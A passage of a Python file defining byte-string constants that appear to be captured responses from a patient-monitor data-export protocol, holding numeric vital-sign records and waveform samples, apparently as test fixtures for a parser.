b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ 
b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ 
b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_7_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ 
b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_7_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_7_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x40\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ 
b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x02\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x44\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xdd\x20\xa5\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\xb1\x21\xd1" \ b"\x09\x6e\x01\x06\x01\x02\x04\x00\x01\x00\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x01\x04\x00\x01\x00\x1f\xfc\x1f\xfa\x1f\xf9" \ b"\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ 
b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6" \ b"\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf9" \ b"\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb" \ b"\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xf3\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9" \ b"\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb" \ b"\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1" \ b"\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe9" \ b"\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed\x1f\xed\x1f\xef\x1f\xef\x1f\xf1" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9" \ b"\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff\x1f\xfd\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_7_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x48\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_7_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x50\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 